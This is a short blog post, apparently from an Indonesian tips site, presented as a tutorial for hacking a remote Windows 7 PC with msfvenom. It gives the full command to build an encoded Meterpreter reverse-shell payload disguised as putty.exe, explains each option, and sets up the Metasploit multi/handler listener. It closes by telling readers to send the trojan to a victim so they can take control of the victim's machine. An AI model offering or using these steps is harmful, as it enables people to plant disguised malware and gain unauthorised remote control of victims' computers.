Warung Online
Headlines News :
mas template
Home » , » Hack Remote Windows 7 PC Easy Way (Msfvenom Tutorial)

Hack Remote Windows 7 PC Easy Way (Msfvenom Tutorial)

Written By Trik Cari Duit on Kamis, 16 Agustus 2012 | 10.49

Msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:
  • One single tool
  • Standardized command line options
  • Increased speed
Open your terminal and type msfvenom –h Msfvenom has a wide range of options available


Now type

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai –I 5 –b ‘x00’ lhost= 192.168.1.3 lport= 4444 –f exe > putty.exe


-p for payload
Windows/meterpreter/reverse_tcp
-e encoder that you want to use
x86/shikata_ga_nai
Lhost (IP address of your local host)
192.168.1.3
Lport (Port of your local pc)
4444
-i 5-b '\x00
Remove for bad character
-f format
Output format
Now we successfully generate the malicious exe File, it will stored on your local computer
/root/putty.exe


Now open your backtrack terminal and type msfconsole


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your putty.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger